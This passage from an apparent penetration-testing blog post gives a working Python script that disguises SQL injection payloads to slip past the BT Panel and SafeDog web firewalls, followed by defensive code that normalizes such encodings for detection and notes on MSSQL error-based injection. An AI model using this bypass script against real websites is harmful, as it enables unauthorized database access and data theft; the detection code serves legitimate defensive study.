Notes on a manual injection bypassing BT Panel (宝塔) + SafeDog (安全狗) during an interview (3)

5. Finally, extend the script so that it accepts the payload as input. The final code is as follows:

    import random


    def bypass(payload):
        # URL-encoded control characters (and the space) used to pad keywords
        chars1 = ['%01', '%02', '%03', '%04', '%05', '%06', '%07', '%08', '%09',
                  '%0A', '%0B', '%0C', '%0D', '%0E', '%0F', '%10', '%11', '%12',
                  '%13', '%14', '%15', '%16', '%17', '%18', '%19', '%1A', '%1B',
                  '%1C', '%1D', '%1E', '%1F', '%20']
        # Substitutes for a literal space
        chars2 = ["/**/", "/*!*/", "/*!safe6*/", "+"]
        v = random.choice(chars1)
        payload = payload.replace(" ", random.choice(chars2))
        payload = payload.replace("=", v + "=" + v)
        payload = payload.replace("AND", v + "AND" + v)
        payload = payload.replace("and", v + "AND" + v)
        payload = payload.replace("WHERE", v + "WHERE" + v)
        payload = payload.replace("where", v + "where" + v)
        # %uXXXX-encode one letter of each keyword
        payload = payload.replace("UNION", "u%u006eion")
        payload = payload.replace("union", "u%u006eion")
        payload = payload.replace("CHAR", "%u0063har")
        payload = payload.replace("char", "%u0063har")
        payload = payload.replace("SELECT", "se%u006cect")
        payload = payload.replace("select", "se%u006cect")
        payload = payload.replace("FROM", "%u0066rom")
        payload = payload.replace("from", "%u0066rom")
        payload = payload.replace("(", "+(")
        payload = payload.replace(".", ".+")
        payload = payload.replace("--", "/*!*/--")
        print(payload)


    if __name__ == '__main__':
        # Read payloads in a loop; enter 'q' to quit
        while True:
            payload = input("输入payload:")
            if payload == 'q':
                exit(0)
            if payload:
                bypass(payload)

The script has been packaged and uploaded to GitHub.

Address: https://github.com/safe6Sec/bypassWAF

With that, manual injection can proceed without trouble.
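
Seen from the defending side, every replacement in the script above is reversible: decoding `%uXXXX`, dropping `/*...*/` comments and collapsing control bytes restores the original keywords. The Python below is an added example, not part of the original post or the safe6Sec repository; the names `normalize` and `check_value`, the keyword list and the sample value are constructed for illustration, and it assumes the backend decodes `%uXXXX` escapes, as the script's replacements imply.

```python
import re
from urllib.parse import unquote

U_ESCAPE = re.compile(r"%u([0-9a-fA-F]{4})")   # non-standard %uXXXX escapes
COMMENT = re.compile(r"/\*.*?\*/", re.S)       # /**/, /*!*/, /*!safe6*/
CONTROL = re.compile(r"[\x01-\x20]+")          # %01..%20 used in place of spaces
KEYWORD = re.compile(r"\b(union|select|from|where|and|char)\b", re.I)

# Constructed sample: one query-string value shaped like the script's output.
SAMPLE = ("1/*!safe6*/u%u006eion/*!*/se%u006cect/**/name"
          "+%u0066rom/**/users%0BWHERE%0Bid%0B=%0B1")


def normalize(raw: str) -> str:
    """Reverse the script's substitutions so keyword rules see plain SQL."""
    s = U_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), raw)
    s = unquote(s.replace("+", " "))   # '+' is a space in a query string
    s = COMMENT.sub(" ", s)            # inline comments act as separators
    s = CONTROL.sub(" ", s)            # control bytes act as whitespace
    return s.strip().lower()


def check_value(raw: str) -> dict:
    """Report keywords that only appear after normalization."""
    norm = normalize(raw)
    before = {k.lower() for k in KEYWORD.findall(raw)}
    after = set(KEYWORD.findall(norm))
    return {
        "normalized": norm,
        "hidden": sorted(after - before),   # visible only once decoded
        "u_escapes": len(U_ESCAPE.findall(raw)),
        "comments": len(COMMENT.findall(raw)),
    }


if __name__ == "__main__":
    for value in (SAMPLE, "hello+world"):
        print(check_value(value))
```

A value with a non-empty `hidden` list carried SQL keywords that a rule matching the raw bytes would not have seen, which is the condition worth alerting on.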

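MSSQL manual injection

From the earlier steps, this injection point supports both union-based injection and error-based injection. Here I use error-based injection.

Union-based injection requires knowing how many columns the current table has (determined with ORDER BY, the same as in MySQL), and it also requires an echo point, that is, a position whose value is shown in the response.

Error-based injection mainly uses the TOP clause together with NOT IN.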
